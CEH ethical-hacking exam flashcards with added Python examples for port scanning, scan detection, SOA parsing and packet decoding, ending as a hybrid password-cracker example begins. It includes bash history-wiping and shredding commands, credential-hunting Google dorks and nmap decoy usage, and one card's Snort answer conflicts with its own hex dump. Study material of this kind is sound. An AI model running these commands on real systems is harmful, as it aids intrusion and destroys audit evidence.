An ethical hacker is hired to test the security of a business network. The CEH is given no prior knowledge of the network and has specific framework in which to work, defining boundaries, nondisclosure agreements, and the completion date. Which of the following is a true statement? A. A white hat is attempting a black-box test. B. A white hat is attempting a white-box test. C. A black hat is attempting a black-box test. D. A black hat is attempting a gray-box test.

C. Stealth

An ethical hacker is sending TCP packets to a machine with the SYN flag set. None of the SYN/ACK responses on open ports is being answered. Which type of port scan is this? A. Ping sweep B. XMAS C. Stealth D. Full

Source routing

An ethical hacker sends a packet with a deliberate and specific path to its destination. What technique is the hacker using?

C. Split DNS

An organization has a DNS server located in the DMZ and other DNS servers located on the intranet. What is this implementation commonly called? A. Dynamic DNS B. DNSSEC C. Split DNS D. Auto DNS

C) Core Impact D) CANVAS

An organization wants to save time and money and decides to go with an automated approach to pen testing. Which of the following tools would work for this? (Choose two) A) Nmap B) Netcat C) Core Impact D) CANVAS

business impact analysis (BIA)

An organized process to gauge the potential effects of an interruption to critical business operations as a result of disaster, accident, or emergency.

Data Encryption Standard (DES)

An outdated symmetric cipher encryption algorithm, previously U.S. government-approved and used by business and civilian government agencies. It is no longer considered secure because of the ease with which the entire keyspace can be attempted using modern computing, thus making cracking the encryption easy.

asset

Any item of value or worth to an organization, whether physical or virtual.

Improper data/input validation Authentication and Authorization attacks Security misconfiguration Information disclosure Broken session management Buffer overflow issues Cryptography attacks SQL injection Improper error handling and exception management

Application Threats

weaknesses and misconfigurations

Applications include many ___, such as unquoted paths, PATH environment variable misconfiguration, and search-order hijacking, that lead to path interception

Link local

Applies only to hosts on the same subnet

UDP Scanning

Are you open on UDP port 29? --> <-- No response if the port is open, or <-- an ICMP Port Unreachable message if the port is closed
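
The two verdicts above, plus the TCP connect (full-open) scan from the earlier card, reproduced against loopback so it runs offline. This is an added example, not code from the page: a throwaway listener stands in for the "open" port, a port that was just released stands in for the "closed" one, and the ICMP Port Unreachable arriving as ECONNREFUSED on a connected UDP socket is Linux behaviour. Note that an open UDP port that stays silent is indistinguishable from a filtered one, which is why scanners report "open|filtered":

```python
import socket

HOST = "127.0.0.1"  # everything here runs against loopback so it works offline


def tcp_connect_scan(host, port, timeout=1.0):
    """Full-open (connect) scan: the kernel completes SYN, SYN/ACK, ACK for us.
    A completed handshake means open; an immediate RST surfaces as ECONNREFUSED
    (closed); silence until the timeout is what a firewall drop looks like (filtered)."""
    with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
        s.settimeout(timeout)
        try:
            s.connect((host, port))
            return "open"            # closing the socket afterwards sends the FIN/RST
        except ConnectionRefusedError:
            return "closed"
        except socket.timeout:
            return "filtered"


def udp_probe(host, port, timeout=0.5, payload=b"\x00"):
    """UDP scan. A closed port answers with ICMP Port Unreachable, which Linux reports
    on a *connected* UDP socket as ECONNREFUSED. An open port that does not answer
    our payload is indistinguishable from a filtered one, hence 'open|filtered'."""
    with socket.socket(socket.AF_INET, socket.SOCK_DGRAM) as s:
        s.settimeout(timeout)
        s.connect((host, port))
        s.send(payload)
        try:
            s.recv(1024)
            return "open"            # the service replied to our datagram
        except ConnectionRefusedError:
            return "closed"          # ICMP type 3 code 3 came back
        except socket.timeout:
            return "open|filtered"


def _listener(kind):
    """Bind a throwaway listener on an ephemeral port; for TCP also listen()."""
    srv = socket.socket(socket.AF_INET, kind)
    srv.bind((HOST, 0))
    if kind == socket.SOCK_STREAM:
        srv.listen(1)
    return srv, srv.getsockname()[1]


def _free_port(kind):
    """Reserve then release an ephemeral port so we have one that is currently closed."""
    srv, port = _listener(kind)
    srv.close()
    return port


def demo():
    """Probe an open and a closed port of each kind on loopback and return the verdicts."""
    results = {}
    tcp_srv, tcp_port = _listener(socket.SOCK_STREAM)
    results["tcp_open"] = tcp_connect_scan(HOST, tcp_port)
    tcp_srv.close()
    results["tcp_closed"] = tcp_connect_scan(HOST, _free_port(socket.SOCK_STREAM))

    udp_srv, udp_port = _listener(socket.SOCK_DGRAM)   # bound but silent: never replies
    results["udp_open_silent"] = udp_probe(HOST, udp_port)
    udp_srv.close()
    results["udp_closed"] = udp_probe(HOST, _free_port(socket.SOCK_DGRAM))
    return results


if __name__ == "__main__":
    for name, verdict in demo().items():
        print(f"{name:16} {verdict}")
```

The "filtered" TCP verdict cannot be produced on loopback (nothing drops packets there); against a real stateful firewall it is the timeout branch. A connect scan completes the handshake and therefore lands in the target's application logs, which is the difference from the half-open (stealth) scan on the later card.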

fragmented packets

Attackers can use Colasoft Packet Builder to create ____ to bypass firewalls and IDS systems in a network

encode malicious content

Attackers can use DNS tunneling to ___ or data of other programs within DNS queries and replies

B. ICMP is being filtered.

As a pen test on a major international business moves along, a colleague discovers an IIS server and a mail exchange server on a DMZ subnet. You review a ping sweep accomplished earlier in the day on that subnet and note neither machine responded to the ping. What is the most likely reason for the lack of response? A. The hosts might be turned off or disconnected. B. ICMP is being filtered. C. The destination network might be down. D. The servers are Linux based and do not respond to ping requests.

B. Passive

As a pen test team member, you begin searching for IP ranges owned by the target organization and discover their network range. You also read job postings and news articles and visit the organization's website. Throughout the first week of the test, you also observe when employees come to and leave work, and you rummage through the trash outside the building for useful information. Which type of footprinting are you accomplishing? A. Active B. Passive C. Reconnaissance D. None of the above

B)Creates a binary log file in a specific folder.

As a security professional for your company, you must perform routine network analysis. Today you must perform a traffic capture using tcpdump. You run the tcpdump -w /log command. What does this command do? A)Captures the packets from a particular host. B)Creates a binary log file in a specific folder. C)Reads packets from a specific folder. D)Captures the packets on a specific interface.

B. Privacy Act

As part of a pen test on a U.S. government system, you discover files containing Social Security numbers and other sensitive personally identifiable information (PII) information. You are asked about controls placed on the dissemination of this information. Which of the following acts should you check? A. FISMA B. Privacy Act C. PATRIOT Act D. Freedom of Information Act

B)Network administrator issues RFID cards for the server room and reviews the door logs

As part of a security audit, your team is looking for common security design issues. In which scenario would applying the segregation of duties principle enhance security? A)IT techs have passwords of 5 characters, while users have passwords of 12 characters B)Network administrator issues RFID cards for the server room and reviews the door logs C)Sales group both creates marketing materials and edits the materials D)User is allowed to install his own software and attach hardware to his computer

A. Gray box

As part of the preparation phase for a pen test you are participating in, the client relays their intent to discover security flaws and possible remediation. They seem particularly concerned about internal threats from the user base. Which of the following best describes the test type the client is looking for? A. Gray box B. Black box C. White hat D. Black hat

C)Active port scanning on 10.1.1.119

As part of your job duties, you must regularly review the log files for several servers on your network. Recently while reviewing the log files for a server with the IP address of 10.1.1.119, you see the following events: Time: Dec 28 02:12:48 Port: 20 Source: 10.1.1.26 Destination: 10.1.1.119 Protocol: TCP Time: Dec 28 02:12:54 Port: 21 Source: 10.1.1.26 Destination: 10.1.1.119 Protocol: TCP Time: Dec 28 02:13:01 Port: 22 Source: 10.1.1.26 Destination: 10.1.1.119 Protocol: TCP Time: Dec 28 02:13:07 Port: 23 Source: 10.1.1.26 Destination: 10.1.1.119 Protocol: TCP Time: Dec 28 02:13:15 Port: 25 Source: 10.1.1.26 Destination: 10.1.1.119 Protocol: TCP Time: Dec 28 02:13:21 Port: 80 Source: 10.1.1.26 Destination: 10.1.1.119 Protocol: TCP Time: Dec 28 02:13:24 Port: 110 Source: 10.1.1.26 Destination: 10.1.1.119 Protocol: TCP Which activity occurred according to these entries? A)Active port scanning on 10.1.1.26 B)DoS attack against 10.1.1.26 C)Active port scanning on 10.1.1.119 D)DoS attack against 10.1.1.119
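
The reasoning behind answer C, one source touching many distinct ports on one destination within seconds, turned into detection logic. This is an added example and not part of the page; the log lines are the seven entries from the card, the year is assumed (the log has none), and the thresholds (5 ports in 120 s) are my own choices:

```python
import re
from collections import defaultdict
from datetime import datetime

# Constructed sample: the seven entries from the card above, one per line.
# (The year is not in the log; 2024 is assumed when parsing.)
SAMPLE_LOG = """\
Time: Dec 28 02:12:48 Port: 20 Source: 10.1.1.26 Destination: 10.1.1.119 Protocol: TCP
Time: Dec 28 02:12:54 Port: 21 Source: 10.1.1.26 Destination: 10.1.1.119 Protocol: TCP
Time: Dec 28 02:13:01 Port: 22 Source: 10.1.1.26 Destination: 10.1.1.119 Protocol: TCP
Time: Dec 28 02:13:07 Port: 23 Source: 10.1.1.26 Destination: 10.1.1.119 Protocol: TCP
Time: Dec 28 02:13:15 Port: 25 Source: 10.1.1.26 Destination: 10.1.1.119 Protocol: TCP
Time: Dec 28 02:13:21 Port: 80 Source: 10.1.1.26 Destination: 10.1.1.119 Protocol: TCP
Time: Dec 28 02:13:24 Port: 110 Source: 10.1.1.26 Destination: 10.1.1.119 Protocol: TCP
"""

LINE_RE = re.compile(
    r"Time:\s*(?P<ts>[A-Za-z]{3}\s+\d{1,2}\s+\d{2}:\d{2}:\d{2})\s+"
    r"Port:\s*(?P<port>\d+)\s+Source:\s*(?P<src>[\d.]+)\s+"
    r"Destination:\s*(?P<dst>[\d.]+)\s+Protocol:\s*(?P<proto>\w+)"
)


def parse_log(text, year=2024):
    """Turn the log lines into event dicts; lines that do not match are skipped."""
    events = []
    for line in text.splitlines():
        m = LINE_RE.search(line)
        if not m:
            continue
        ts = datetime.strptime(f"{year} {' '.join(m['ts'].split())}", "%Y %b %d %H:%M:%S")
        events.append({"ts": ts, "port": int(m["port"]), "src": m["src"],
                       "dst": m["dst"], "proto": m["proto"]})
    return events


def detect_port_scans(events, min_ports=5, window_seconds=120):
    """Flag a (source, destination) pair when it touches at least `min_ports`
    distinct destination ports inside any `window_seconds`-long sliding window.
    Many hits on ONE port from one source would be the DoS/brute-force shape instead."""
    by_pair = defaultdict(list)
    for e in events:
        by_pair[(e["src"], e["dst"])].append(e)

    findings = []
    for (src, dst), evs in by_pair.items():
        evs.sort(key=lambda e: e["ts"])
        best, start = None, 0
        for end in range(len(evs)):
            while (evs[end]["ts"] - evs[start]["ts"]).total_seconds() > window_seconds:
                start += 1
            ports = sorted({e["port"] for e in evs[start:end + 1]})
            if len(ports) >= min_ports and (best is None or len(ports) > len(best["ports"])):
                best = {"scanner": src, "target": dst, "ports": ports,
                        "first": evs[start]["ts"], "last": evs[end]["ts"]}
        if best:
            findings.append(best)   # one finding per pair, covering the widest window
    return findings


if __name__ == "__main__":
    for f in detect_port_scans(parse_log(SAMPLE_LOG)):
        print(f"port scan of {f['target']} from {f['scanner']}: ports {f['ports']} "
              f"between {f['first']:%H:%M:%S} and {f['last']:%H:%M:%S}")
```

The sliding window matters: the same seven probes spread over a day (a slow scan) fall under the threshold, which is exactly the evasion the "Scanning Beyond IDS" step on the methodology card relies on.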

router

As the packet travels through the nodes in the network, each ___ examines the destination IP address and chooses the next hop to direct the packet to the destination

C)www.netcraft.com

As your company's ethical hacker, you often perform routine penetration tests to check the security for your company's network. Last week, an attacker posted details obtained through operating system fingerprinting about your company's servers. You need to perform the same type of check to verify what information is available. Which tool should you use? A)www.webextractor.com B)www.changedetection.com C)www.netcraft.com D)www.whois.com

Encrypted HTTPS protocol to send exploits to the Web server

As your company's security practitioner, you are responsible for overall network security, which includes an IDS and a firewall. In addition, you must ensure that the company's Web server is protected. Your company's Web server has been the target of an advanced persistent threat (APT). The IDS log files do not show any intrusion attempts, but the Web server constantly locks up and requires constant rebooting. After the latest incident, you review the firewall logs and notice a large number of SSL request packets. You decide to implement the following security measures: Install a proxy server and terminate SSL at the proxy Install a hardware SSL accelerator and terminate SSL at that layer. What is the best description of the attack vector? A)Encrypted HTTPS protocol to send exploits to the Web server B)Encrypted IPSec protocol to send exploits to the firewall C)Encrypted IPSec protocol to send exploits to the Web server D)Encrypted HTTPS protocol to send exploits to the firewall

Confidentiality

Assurance that the information is accessible only to those authorized to have access

Availability

Assurance that the systems responsible for delivering, storing, and processing information are accessible when required by the authorized users

Network (Layer 3)

At which layer of the OSI model do packet filtering firewalls operate?

Application (Layer 7)

At which layer of the OSI model do proxy servers operate?

Application layer (Layer 7)

At which layer of the OSI model does a cross-site scripting attack occur?

determine key hosts in the network

Attackers can gather DNS information to _____ and can perform social engineering attacks.

exfiltrate stolen confidential

Attackers can make use of this back channel to ___ or sensitive information from the server using DNS tunneling

spoofed tokens

Attackers can obtain access tokens of other users or generate ___ to escalate privileges and perform malicious activities while evading detection

cat /dev/null > ~/.bash_history && history -c && exit

BASH Clearing the user's complete history

export HISTSIZE=0

BASH Disabling history

shred ~/.bash_history (shreds the history file, making its content unreadable) shred ~/.bash_history && cat /dev/null > ~/.bash_history && history -c && exit (shreds the history file and clears the evidence of the command)

BASH Shredding the history

disaster recovery plan (DRP)

BCPs include a ___ that addresses exactly what to do to recover any lost data or services.

1) Inform employees about what you collect, why, and what you will do with it 2) Keep employees' personal information accurate, complete, and up to date 3) Limit the collection of information and collect it by fair and lawful means 4) Provide employees access to their personal information 5) Inform employees about the potential collection, use, and disclosure of personal information 6) Keep employees' personal information secure

Basic Rules for Privacy Policies at Workplace

integrity

Bit flipping is one form of an ___ attack.

- Check for Live Systems - Check for Open Ports - Scanning Beyond IDS - Banner Grabbing - Scan for Vulnerability - Draw Network Diagrams - Prepare Proxies - Scanning Pen Testing

CEH Scanning Methodology

Information Systems Audit and Control Association (ISACA) and IT Governance Institute (ITGI)

COBIT (Control Objectives for Information and Related Technologies) was created by what?

Planning and organization Acquisition and implementation Delivery and support Monitoring and evaluation

COBIT categorizes control objectives into what domains?

No

Can you complete the three-way handshake and open a successful TCP connection with spoofed IP addresses?

Sniffing the network traffic

Capturing and analyzing packets from the target enables an attacker to determine OS used by the remote system

Tails

Censorship Circumvention Tool

C) ARP poisoning

Certain switches provide several security features. What would enabling DHCP snooping help prevent? A) MAC flooding B) DNS flooding C) ARP poisoning D) DNS poisoning

B. The host is most likely a printer or has a printer installed.

Consider the ports shown in the nmap output returned on an IP scanned during footprinting: PORT STATE SERVICE 21/tcp open ftp 23/tcp open telnet 80/tcp open http 139/tcp open netbios-ssn 515/tcp open 631/tcp open ipp 9100/tcp open MAC Address: 01:2A:48:0B:AA:81 Which of the following is true regarding the output? A. The host is most likely a router or has routing enabled. B. The host is most likely a printer or has a printer installed. C. The host is definitely a Windows Server. D. The host is definitely a Linux Server.

White hats

Considered the good guys, these are the ethical hackers, hired by a customer for the specific goal of testing and improving security or for other defensive purposes. Need prior consent. Also known as security analysts.

corrective controls

Controls internal to a system designed to resolve vulnerabilities and errors soon after they arise.

CCleaner DBAN Privacy Eraser Wipe BleachBit ClearProg

Covering Tracks Tools

plists

Daemons have ___ that are linked to executables that run at start up

Source Port, Destination Port; Sequence Number; Acknowledgment Number; Data Offset, Reserved, Flags, Window; Checksum, Urgent Pointer; Options, Padding; Data

Describe the TCP segment structure

SYN, sequence #105 ---> <--- SYN/ACK, (your) sequence #106, (my) sequence #223 ACK, (your) sequence #224, (my) sequence #106 --->

Describe the three-way handshake.

StegoStick StegJ Office XML SNOW Data Stash Hydan

Document Steganography Tools

authenticity

Digital signatures can be used to guarantee the ___ of the person sending a message.

Attacker --> Target: packet with spoofed source 10.0.0.5, IP TTL 13. Target --> real 10.0.0.5: probe sent to the real 10.0.0.5. Real 10.0.0.5 --> Target: reply, IP TTL 25. The TTLs differ, so the first packet did not come from 10.0.0.5.

Direct TTL Probe flow

site:domain or web page string example: site:anywhere.com passwds

Displays pages for a specific website or domain holding the search term.

index of/string example: "intitle:index of" passwd

Displays pages with directory browsing enabled, usually used with another operator.

inurl:string example: inurl:passwd example: allinurl: etc passwd

Displays pages with the string in the URL.

live machines, ports, port status, OS details, device type, system uptime

During the Scanning Phase what type of information can be extracted?

C)Results of past audits as examples of previous work

During the presentation of bids for penetration testing work, which of the following additions to a proposal would be unethical to submit? A)Suggestions of testing formats that worked in the past B)Letters of recommendation from former customers C)Results of past audits as examples of previous work D)Time estimates based on previous experience

A)Assign read-only permission to all HTML files and folders for the www-data group

During vulnerability assessment, you rank the public-facing website as an integral asset to the company's continued reputation and revenue. But there are several potential threats to the Apache HTTP Server that hosts the website. The static webpages in particular could be vulnerable to defacement. Which security control should you implement? A)Assign read-only permission to all HTML files and folders for the www-data group B)Assign write permissions to the web root for only the www-data group C)Assign write-only permission to all HTML files and folders for the www-data group D)Assign read and write permissions to the web root for only the www-data group

A)Pre-Attack

During which phase of security testing is a non-disclosure agreement (NDA) executed? A)Pre-Attack B)Attack C)Post Attack D)Recon

-By default, LDAP traffic is transmitted unsecured; use SSL or STARTTLS technology to encrypt the traffic -Select a user name different from your email address and enable account lockout

Enumeration Countermeasures for LDAP

-Disable SMB protocol on Web and DNS Servers -Disable SMB protocol on Internet facing servers -Disable ports TCP 139 and TCP 445 used by the SMB protocol -Restrict anonymous access through RestrictNullSessAccess parameter from the Windows Registry

Enumeration Countermeasures for SMB

Configure SMTP servers to: -Ignore email messages to unknown recipients -Not to include sensitive mail server and local host information in mail responses -Disable open relay feature -Limit the number of accepted connections from a source in order to prevent brute force attacks

Enumeration Countermeasures for SMTP

ICMP Type 3 Code 10

Error message - Host administratively prohibited

ICMP Type 3 Code 7

Error message - Host unknown

ICMP Type 3 Code 9

Error message - Network administratively prohibited

ICMP Type 3 Code 6

Error message - Network unknown

Banner grabbing from error messages

Error messages provide information such as type of server, type of OS, and SSL tool used by the target remote system

verify the existence of exploitable vulnerabilities

Ethical hacking focuses on simulating techniques used by attackers to _____ in the system security

identify vulnerabilities

Ethical hacking involves the use of hacking tools, tricks, and techniques to ______ so as to ensure system security

B. The capture shows step 2 of a TCP handshake.

Examine the Snort output shown here: 08/28-12:23:13.014491 01:10:BB:17:E3:C5 -> A5:12:B7:55:57:AB type: 0x800 len: 0x3C 190.168.5.12:33541 -> 213.132.44.56:23 TCP TTL:128 TOS: 0x0 ID:12365 IpLen:20 DgmLen:48 DF ***A**S* Seq: 0xA153BD Ack: 0xA01657 Win: 0x2000 TcpLen: 28 TCP Options (4) => MSS: 1460 NOP NOPSackOK 0x000: 00 02 B3 87 84 25 00 10 5A 01 0D 5B 08 00 45 00 .%..Z..[..E. 0x0010: 00 30 98 43 40 00 80 06 DE EC C0 A8 01 04 C0 A8 .0.C@... 0x0020: 01 43 04 DC 01 BB 00 A1 8B BD 00 00 00 00 70 02 .C....p. 0x0030: 20 00 4C 92 00 00 02 04 05 B4 01 01 04 02 .L..... Which of the following is true regarding the packet capture? A. The capture indicates a NOP sled attack. B. The capture shows step 2 of a TCP handshake. C. The packet source is 213.132.44.56. D. The packet capture shows an SSH session attempt.

A. One hour

Examine the following SOA record: @ IN SOARDNSRV1.somebiz.com. postmaster.somebiz.com. ( 200408097 ; serial number 3600 ; refresh [1h] 600 ; retry [10m] 86400 ; expire [1d] 7200 ) ; min TTL [2h] How long will the secondary server wait before asking for an update to the zone file? A. One hour B. Two hours C. Ten minutes D. One day
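
Parsing the record and applying the four timers and the serial rule the way a secondary does. This is an added example, not code from the page; the primary server's hostname is garbled on the card ("SOARDNSRV1"), so dnsrv1.somebiz.com. is assumed, and the serial comparison uses RFC 1982 arithmetic rather than a plain greater-than so that a wrapped serial is still seen as newer:

```python
# Constructed input: the SOA record from the card, one field per line. The primary
# name server's hostname is garbled on the card ("SOARDNSRV1"); dnsrv1 is assumed.
SOA_TEXT = """\
@   IN  SOA dnsrv1.somebiz.com. postmaster.somebiz.com. (
            200408097   ; serial number
            3600        ; refresh [1h]
            600         ; retry [10m]
            86400       ; expire [1d]
            7200 )      ; min TTL [2h]
"""

SOA_FIELDS = ("serial", "refresh", "retry", "expire", "minimum")


def parse_soa(text):
    """Strip ';' comments and parentheses, then read MNAME, RNAME and the five timers."""
    body = " ".join(line.split(";", 1)[0] for line in text.splitlines())
    tokens = body.replace("(", " ").replace(")", " ").split()
    i = tokens.index("SOA")
    rec = {"owner": tokens[0], "mname": tokens[i + 1], "rname": tokens[i + 2]}
    rec.update(zip(SOA_FIELDS, (int(t) for t in tokens[i + 3:i + 8])))
    # RNAME encodes an email address with the first '.' standing in for '@'
    rec["contact"] = rec["rname"].rstrip(".").replace(".", "@", 1)
    return rec


def next_poll_seconds(soa, last_refresh_ok=True):
    """A secondary re-checks the primary every REFRESH seconds; after a failed
    check it retries every RETRY seconds instead."""
    return soa["refresh"] if last_refresh_ok else soa["retry"]


def zone_expired(soa, seconds_since_last_success):
    """After EXPIRE seconds without a successful refresh the secondary stops
    answering for the zone rather than serve stale data."""
    return seconds_since_last_success >= soa["expire"]


def needs_transfer(primary_serial, secondary_serial):
    """Transfer only when the primary's serial is newer. RFC 1982 serial-number
    arithmetic: 'newer' means ahead by less than 2**31 modulo 2**32, so a serial
    that wrapped past 0xFFFFFFFF still counts as newer."""
    diff = (primary_serial - secondary_serial) % 2**32
    return diff != 0 and diff < 2**31


if __name__ == "__main__":
    soa = parse_soa(SOA_TEXT)
    print(soa)
    print("secondary polls again in", next_poll_seconds(soa), "s")
```

The refresh value (3600 s) is what the question asks for; from a footprinting angle the same record also leaks the hostmaster's mailbox and the primary's hostname, which is why the countermeasure cards recommend split DNS and restricted zone transfers.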

B. This rule will alert on packets coming from outside the designated home address. D. This rule will alert on packets designated on port 23, from any port, containing the "admin" string.

Examine the following Snort rule: alert tcp !$HOME_NET any -> $HOME_NET 23 (content: "admin"; msg: "Telnet attempt..admin access";) Which of the following are true regarding the rule? (Choose all that apply.) A. This rule will alert on packets coming from the designated home network. B. This rule will alert on packets coming from outside the designated home address. C. This rule will alert on packets designated for any port, from port 23, containing the "admin" string. D. This rule will alert on packets designated on port 23, from any port, containing the "admin" string.

A. The operator is enumerating a system named someserver.

Examine the following command sequence: C:\> nslookup Default Server: ns1.anybiz.com Address: 188.87.99.6 > set type=HINFO > someserver Server: resolver.anybiz.com Address: 188.87.100.5 Someserver.anybiz.com CPU=Intel Quad Chip OS=Linux 2.8 Which of the following best describes the intent of the command sequence? A. The operator is enumerating a system named someserver. B. The operator is attempting DNS poisoning. C. The operator is attempting a zone transfer. D. The operator is attempting to find a name server.

B. Nslookup is in interactive mode. C. The output will show all mail servers in the zone somewhere.com.

Examine the following command-line entry: C:\>nslookup Default Server: ns1.somewhere.com Address: 128.189.72.5 > set q=mx > mailhost Which statements are true regarding this command sequence? (Choose two.) A. Nslookup is in non-interactive mode. B. Nslookup is in interactive mode. C. The output will show all mail servers in the zone somewhere.com. D. The output will show all name servers in the zone somewhere.com

Comments in the source code Contact details of web developer or admin File system structure Script type

Examining HTML source provides what kind of information?

Access Control Policy Remote-Access Policy Firewall-Management Policy Network-Connection Policy Password Policy User-Account Policy Information-Protection Policy Special-Access Policy Email Security Policy Acceptable-Use Policy

Examples of Security Policies

Facial images Fingerprints Handwriting samples

Examples of biometrics

filetype:rcf inurl:vpn

Finds SonicWall Global VPN Client files containing sensitive information and login credentials

filetype:pcf vpn OR Group

Finds publicly accessible profile configuration files (.pcf) used by VPN clients

SYN sequence number

First, a session must be established between the two systems. To do this, the sender forwards a segment with the ___ flag set, indicating a desire to synchronize a communications session. This segment also contains a ____ -- a pseudo-random number that helps maintain the legitimacy and uniqueness of this session.

- Restrict employees from accessing social networking sites from the organization's network - Configure web servers to avoid information leakage - Educate employees to use pseudonyms on blogs, groups, and forums - Do not reveal critical information in press releases, annual reports, product catalogues, etc. - Limit the amount of information that you publish on the website/Internet - Use footprinting techniques to discover and remove any sensitive information that is publicly available - Prevent search engines from caching web pages and use anonymous registration services

Footprinting Countermeasures

- Enforce security policies to regulate the information that employees can reveal to third parties - Separate internal and external DNS or use split DNS, and restrict zone transfers to authorized servers - Disable directory listings on web servers - Educate employees about various social engineering tricks and risks - Opt for privacy services on the Whois lookup database - Avoid domain-level cross-linking for critical assets - Encrypt and password-protect sensitive information

Footprinting Countermeasures (cont'd)

Maltego Recon-ng FOCA Prefix Whois Netmask NetScanTools Pro Binging Tctrace SearchBug Autonomous System Scanner (ASS) TinEye DNS-Digger Robtex Dig Web Interface SpiderFoot White Pages NSlookup Email Tracking Tool Zaba Search yoName GeoTrace Ping-Probe DomainHostingView MetaGoofil GMapCatcher Wikto SearchDiggity SiteDigger Google HACK DB Google Hacks Gooscan BiLE Suite Trellian

Footprinting Tools

pen testing

Footprinting ____ is used to determine an organization's publicly available information

security posture

Footprinting allows attackers to know the ___ of the target organization

Facebook Linkedin Twitter Google+ Pinterest

Gather information about the target organization's employees from their personal profiles on social networking sites such as ____, etc., which assists in performing social engineering

Market value of a company's shares Company profile Competitor details

Gathering Information from Financial Services provides what kinds of information?

nmap -D RND:10 [target]

Generates 10 random decoy source addresses using Nmap

A. SYN, SYN/ACK, ACK

Given the following Wireshark filter, what is the attacker attempting to view? ((tcp.flags == 0x02) || (tcp.flags == 0x12)) || ((tcp.flags == 0x10) && (tcp.ack==1) && (tcp.len==0)) A. SYN, SYN/ACK, ACK B. SYN, FIN, URG, and PSH C. ACK, ACK, SYN, URG D. SYN/ACK only
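
The flag values in that filter (0x02 SYN, 0x12 SYN/ACK, 0x10 bare ACK) decoded from raw bytes, using the Snort hex dump from the earlier "Examine the Snort output" card as input and following the segment layout and handshake cards above. This is an added example and not code from the page. It also shows the check I would make before trusting any capture summary: the hex beneath that card's header decodes as a plain SYN (step 1) from 192.168.1.4:1244 to 192.168.1.67:443, while the summary line above it shows ***A**S* between different addresses; the answer key follows the summary line, but the bytes say otherwise.

```python
import struct
from ipaddress import IPv4Address

# Constructed input: the hex bytes from the Snort dump on the earlier card,
# with the garbled ASCII column dropped.
SNORT_HEX = """\
0x0000: 00 02 B3 87 84 25 00 10 5A 01 0D 5B 08 00 45 00
0x0010: 00 30 98 43 40 00 80 06 DE EC C0 A8 01 04 C0 A8
0x0020: 01 43 04 DC 01 BB 00 A1 8B BD 00 00 00 00 70 02
0x0030: 20 00 4C 92 00 00 02 04 05 B4 01 01 04 02
"""

# Flag bits in the low byte of the TCP offset/flags word (RFC 793 order).
TCP_FLAGS = [(0x01, "FIN"), (0x02, "SYN"), (0x04, "RST"),
             (0x08, "PSH"), (0x10, "ACK"), (0x20, "URG")]


def hexdump_to_bytes(dump):
    """Parse 'offset: xx xx ...' lines into raw bytes."""
    out = bytearray()
    for line in dump.strip().splitlines():
        _, _, rest = line.partition(":")
        out.extend(int(tok, 16) for tok in rest.split())
    return bytes(out)


def flag_names(flags):
    return [name for bit, name in TCP_FLAGS if flags & bit]


def handshake_step(flags):
    """0x02 = SYN, 0x12 = SYN/ACK, 0x10 = bare ACK: the three values the Wireshark
    filter on the card isolates. Anything else (e.g. 0x29, an XMAS probe) is None."""
    return {0x02: 1, 0x12: 2, 0x10: 3}.get(flags & 0x3F)


def parse_frame(frame):
    """Ethernet -> IPv4 -> TCP, returning the fields a scan analyst looks at."""
    if struct.unpack("!H", frame[12:14])[0] != 0x0800:
        raise ValueError("not an IPv4 frame")
    ip = frame[14:]
    ihl = (ip[0] & 0x0F) * 4
    total_len, ident, frag, ttl, proto = struct.unpack("!HHHBB", ip[2:10])
    if proto != 6:
        raise ValueError("not TCP")
    src, dst = IPv4Address(ip[12:16]), IPv4Address(ip[16:20])
    tcp = ip[ihl:total_len]
    sport, dport, seq, ack, off_flags, window = struct.unpack("!HHIIHH", tcp[:16])
    flags = off_flags & 0x1FF            # 9 bits: NS plus the six classic flags
    return {
        "src": str(src), "dst": str(dst), "ttl": ttl, "ip_id": ident,
        "df": bool(frag & 0x4000), "sport": sport, "dport": dport,
        "seq": seq, "ack": ack, "tcp_hdr_len": (off_flags >> 12) * 4,
        "flags": flags, "flag_names": flag_names(flags), "window": window,
        "handshake_step": handshake_step(flags),
    }


if __name__ == "__main__":
    p = parse_frame(hexdump_to_bytes(SNORT_HEX))
    print(f"{p['src']}:{p['sport']} -> {p['dst']}:{p['dport']} "
          f"flags={'/'.join(p['flag_names'])} seq={p['seq']:#x} ack={p['ack']:#x} "
          f"ttl={p['ttl']} win={p['window']:#x} step={p['handshake_step']}")
```

The ACK clause of the Wireshark filter additionally requires tcp.len==0, because a bare ACK carrying data is ordinary traffic, not the third step of a handshake; this decoder leaves that to the caller since the dump above carries no payload.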

A)Generate a banner that describes what service is running on port 443 if it is open

Given this command: telnet 192.168.5.5 443 What will it do? A)Generate a banner that describes what service is running on port 443 if it is open B)Close all open Telnet sessions in 4 minutes and 43 seconds C)Open a Telnet session with the device at 192.168.5.5 in 4 minutes and 43 seconds D)Test the Telnet connection every 443 seconds and sends an alert if it doesn't answer

TCP/UDP 3268

Global Catalog Service

hidden storage

GrayFish is a Windows kernel rootkit that runs inside the Windows operating system and provides an effective mechanism, ___, and malicious command execution while remaining invisible

Non-Repudiation

Guarantee that the sender of a message cannot later deny having sent the message and that the recipient cannot deny having received the message

modifying system or application features

Hacking involves ___ or ___ to achieve a goal outside of the creator's original purpose

-Open Local Group Policy Editor and navigate to Local Computer Policy --> Computer Configuration --> Administrative Templates --> Network --> DNS Client -In DNS client, double-click on Turn off multicast name resolution -Select the Disabled radio button and then click OK

How do you disable LLMNR?

-Open Control Panel and navigate to Network and Internet --> Network and Sharing Center and click on Change adapter settings option present on the right side -Right-click on the network adapter and click Properties, select TCP/IPv4 and then click Properties -Under General tab, go to Advanced --> WINS -From the NetBIOS options, check "Disable NetBIOS over TCP/IP" radio button and click OK

How do you disable NBT-NS

1) Connect to the SOA 2) Enter nslookup at the command line. 3) Type server <IPAddress>, using the IP address of the SOA. Press ENTER. 4) Type ls -d domainname.com, where domainname.com is the name of the zone, and then press ENTER.

How do you do a zone transfer with nslookup?

Open snort.conf and comment out the include lines for the rule files you do not wish to load

How do you prevent rule files from loading when snort is started?

1) nslookup 2) server servername

How do you switch to your target's server using nslookup?

Uses a word list based on variations of dictionary words to discover the password

How does a hybrid password attack work? A)Uses different known factors about the user, such as date of birth, license number, and other personally identifiable information (PII) to discover the password B)Uses every possible combination of letters, numbers, and special characters to discover the password C)Uses a word list based on variations of dictionary words to discover the password D)Uses a dictionary input list to discover the password
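
A hybrid generator in working form, added here as an example (not code from the page): dictionary words expanded with case, leetspeak and affix mutations, then hashed against a target. The mutation rules and the unsalted SHA-256 targets are my own constructions; real attacks use the victim system's hash format and far larger rule sets.

```python
import hashlib
import itertools

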